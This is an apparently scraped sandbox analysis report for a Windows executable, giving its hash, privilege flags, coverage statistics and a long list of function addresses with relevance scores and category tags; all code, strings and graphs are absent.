MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Execution Graph
Execution Coverage: | 18.6% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.7% |
Total number of Nodes: | 1525 |
Total number of Limit Nodes: | 34 |
Graph
Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07191798 Relevance: 14.6, Strings: 11, Instructions: 836COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009C5E30 Relevance: .5, Instructions: 487COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009C2F68 Relevance: .5, Instructions: 473COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009C4900 Relevance: .1, Instructions: 124COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07191A54 Relevance: .1, Instructions: 122COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009C33E0 Relevance: .1, Instructions: 108COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009C33F0 Relevance: .1, Instructions: 102COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009C2AA0 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009C2A90 Relevance: .1, Instructions: 69COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 009C48F0 Relevance: .1, Instructions: 58COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0095D01D Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0095D005 Relevance: .0, Instructions: 43COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 071908A0 Relevance: 9.1, Strings: 7, Instructions: 322COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 071914E8 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07193518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07190570 Relevance: 5.1, Strings: 4, Instructions: 55COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|